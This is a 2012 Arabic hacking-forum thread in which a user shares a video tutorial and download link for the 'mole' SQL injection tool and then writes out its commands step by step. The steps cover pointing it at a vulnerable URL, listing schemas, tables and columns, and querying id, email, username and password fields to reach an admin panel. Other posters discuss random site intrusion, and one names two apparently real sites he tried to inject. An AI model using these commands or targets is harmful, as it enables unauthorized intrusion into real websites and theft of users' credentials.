:: vBspiders Professional Network :: - لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

صفحة 1 من 3

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

- - لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :) (http://www.vbspiders.com/vb/t64306.html)

Q2-ksa

08-17-2012 02:23 AM

لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

1 مرفق

السلام عليكم ورحمة الله وبركاته..

اتمنى تكونون بخير ..ومبروك عليكم العيد جميعاً

هذا اليوم قمت بعمل شرح لاداة
mole

لأن الكثيرمنكم لا تعمل معه الاداة حسب شرح موقع الشركة لها ..
وهذا الشرح الفيديو العربي هو الأول مع التطبيق على موقع من بداية تحميل الاداة :14:
الى أن نقوم بالدخول على لوحة الادمن :clap:

http://im27.gulfup.com/2012-08-17/1345155677701.jpg

طبعاً الاداة خاصة بالحقن ..
واداة قوية صراحه .. ورهيبة ..

ان شاء الله الشرح واضح جداً ..
واي استفسار انا حاضر ..

((بالنسبة لـ الموقع عليكم بالعافية )) :msn-wink:

للتحميل :

mediafire.com/?m451sck8midyow9

انسخوه وضعوه بالمتصفحح ..
لاني ممنوع من وضع الروابط لان مشاركاتي لم تتعدى الـ 5..:no:

او حمّلوا المذكرة المرفقة بالموضوع .. وضعت داخلها الرابط تبع التحميل..

ملاحظة مهمة :
عند اعطاء امر

query
واختيار الاعمدة الخاصة بالبيانات المطلوبة
نفرض انه مثلاً اعطينا الامر بهالطريقة

query ogunch_dbsbs_members id,email,username,password
واعطينا انتر ..
وطلع لنا جدول فاضي !!
نقوم بتكرار الامر لكن باختيار عمود واحد مثلاً هكذا

query ogunch_dbsbs_members id
اخترنا فقط الـ id
سيظهر لنا ارقام الاي دي ..
لكن بعدها نقوم بنكرر الامر مع اختيار الاعمده كلها
الباسوورد والايميل واليوزر نيم والـ اي دي
لانه احياناً يحصل تعليق بسيط ..
وهالكلام قليل يحصل ..
بس حبيت انوّه ع هالشيء ع اساس اكون وضّحت لكم الموضوع بصورة جيده..

مع تحياتي
اخوكم
Q2 - ksa
:wink:

http://im13.gulfup.com/2012-07-22/1342930165151.png
Scanned By GHOST HACK

Q2-ksa

08-17-2012 02:35 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

مرحباً ..
عفواً نسيت احط لكم موقع لاخواننا المبتدئين .. لاظهار مسارات الدخول..
مع ان فيه عدة طرق لاستخراج المسارات ..

y-shahinzadeh.ir/af/index.php

انسخوه لـ المتصفح ..

aircrack -ng

08-17-2012 02:57 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

يعطيك العافيه

ولا واحد يحمل حتى يتم الفحص

!.!	08-17-2012 03:05 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

شكرا لك اخوي جاري التحميل والفحص ...ان شاء الله يكون سالم معافا ان شاء الله يارب..
جزاك الله خيرا عنا وعنك يا حبيبي

Q2-ksa

08-17-2012 03:05 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة aircrack -ng (المشاركة 445834)

يعطيك العافيه

ولا واحد يحمل حتى يتم الفحص

الله يعافيك اخوي ..

انا أضم صوتي لـ صوتك .. ( لا احد يحمل حتى يتم الفحص )..:14:
انا أعلم ان هذا القرار ليس إقلال من الثقة بي .. لكن هو من حق الجميع ..:smile:

محمد50

08-17-2012 03:16 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

حلو العملك وتقديم الموضوعك
لاكن افضل الاخترقات
الاخترق المستهدف عبر (((الوندوز او عبر الانضمه الاخر ))) الانضمه الاخر افضل من الوندوز
وشكنر على التقديم
باااااااااااااااااااااااااااااي
كان معك
محمد50

!.!	08-17-2012 03:17 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة Q2-ksa (المشاركة 445839)

+1000
الملف مفحوص ان شاء الله مافيه شئ حملو لا تخافو
:bleh:

محمد50

08-17-2012 03:17 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

+ لك تقيم على الموضوعك
باااااااااااااااااااااااااااااااي

محمد50

08-17-2012 03:19 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

التقيم
الموضوعك
((("جيد")))

Q2-ksa

08-17-2012 03:25 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة محمد50 (المشاركة 445840)

اهلاً يامحمد ..
الحلو وجودك ..
عندما تريد استهداف موقع .. سـ تلجأ لعدة طرق .. لكن الهدف واحد ..الهدف هو الاختراق ..
وثغرات الـ sql تجدي نفعاً مع الاستهداف ..
و الاختراق العشوائي ممتع لمن يريدون ممارسة الاختراق بشكل عام .. او عمل بعض الشروحات على الشل او على تخطيات الحماية او ع اي هدف قائم لاجل الاختراق ..

بالنسبة لكلامك (عن الانظمة الاخرى) ..
المسألة مسألة خبرة .. وممارسة..
نظام الويندوز في يد (المبرمج) افضل من اللينكس في يد (متوسط الخبرة)..
وعلى فكرة .. الاداة التي قمت بشرحها تعمل على (لينكس وماك وويندوز) ..
ولا يوجد في الانترنت شرح فيديو واضح مثل ماشرحت انا .. الا شرح واحد من الشركة المصنعه للاداة وشرح غير واضح..
فـ نظراً لكثرة طلبات شرح الاداة في عدة مواقع قمت بـ عمل هذا الشرح..
ولم انزل هذا الموضوع الا هنا وفي منتدى صديق لي ..

تمنياتي للجميع بالتوفيق ..
:)

!.!	08-17-2012 03:26 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

والله في حياتي ما شفت شئ فعال مثل هاذي الاداة
اخوي لو تكرم وتحط لنا الاوامر
لكي يكون موضوعك كامل ان شاء الله اليك احر التهاني اليك يا غالي

aircrack -ng

08-17-2012 03:43 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة محمد50 (المشاركة 445840)

انا اشرحلك
الوندوز او اللينكس كل الطرق تاذي الى روما
الوندوز فيه ادوات تشتغل بس على الوندوز ومش موجوده في اللينكس
واللينكس فيه ادوات مش موجوده في الوندوز وتشتغل ع اللينكس
وانا استعمل الوندوز ومركب الباك تراك على نظام وهمي ولما بدي اجرب لدي كلا النظامين

عذرا صاحب الموضوع خرجت عن سياق الموضوع

Q2-ksa

08-17-2012 03:52 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة !.! (المشاركة 445847)

تأمر امر ياغالي ..

الاوامر واضحه في الشرح الفيديو .. لكن يالله ماعليه لعيونكم اضع لكم الاوامر بشكل سريع ..
طبعاً المجلد تبع الاداه فيه ملف exe هذا الاصدار خاص بالويندوز ..وهو الي راح نشغله بامر الدوس ..

بعد نقل الاداة لـ السي نقوم بفتح الدوس والانتقال بالمحرر لـ مسار السي وننتقل ايضاً بالمحرر الى مجلد الاداة .. ونقوم باعطاء هذا الامر
mole.exe -u wwwxxxxxxx.com/index.phpphp?id=3 -n 'schemas'

تشتغل الاداه نعطي الامر
needle schemas

ثم
schemas

راح تطلع الداتا بيس..

tables
ثم مسافه ثم اسم الداتا وانتر .. تظهر الاعمده ..
و
columns
ثم مسافه ثم اسم الداتا بيس وثم مسافة ثم اسم الجدول المطلوب ..وانتر

ثم تظهر لنا الاعمده ..

query
هذا الامر الاخير .. نكتب بعده اسم الداتا بيس التي تم اختيارها مسبقاً ثم مسافة و اسم الجدول ومسافة واسم الاعمده المطلوبه بياناتها مثال
query ogunch_db sbs_members id,email,username,password

في المثال الاعلى :
ogunch_db هذا اسم الداتا تبع الموقع..
sbs_members اسم الجدول
وهذه اسماء الاعمده :
id,email,username,password
طبعاً لازم نضع فاصلة بين كل اسم عمود وعمود اخر ..

وهكذا .. الى نهاية الموضوع..

شرحها واضح جداً ولو بغيتوا ارفعها ع اليوتيوب ماعندي مشكلة ياقماعة..

!.!	08-17-2012 04:00 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

هه صحيت خويا ربي يجازيك ويرفع عنك ان شاء الله لكن انا عملت مثل ماعامل انت بالظبط وظهرت مشكلة وهي

اقتباس:

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)

لم يجد جداول دتا بيز وانا لسع في الطريقة الاولة وان شاء الله نكون ماازعجتك وانا اسف جدا على هذا الصراحت اعجبني الاداة والشرح ربي يعطيك ماتتمنا ان شاء الله
جربتو على ثلاث مواقع لذا شوف هاذو المواقع مصابين بثغرة sql لكن نفس المشكلة شوف
www.cam-ceeds.org/event.php?ID=30
http://valleyviewcasinocenter.com/event.php?id=202

Q2-ksa

08-17-2012 05:07 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

1 مرفق

اقتباس:

المشاركة الأصلية كتبت بواسطة !.! (المشاركة 445852)

هه صحيت خويا ربي يجازيك ويرفع عنك ان شاء الله لكن انا عملت مثل ماعامل انت بالظبط وظهرت مشكلة وهي

حمل المذكرة .. المرفقه في ردي هذا ..

الساعة الآن 10:52 PM

صفحة 1 من 3

عرض 40 مشاركات من هذا الموضوع لكل صفحة

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0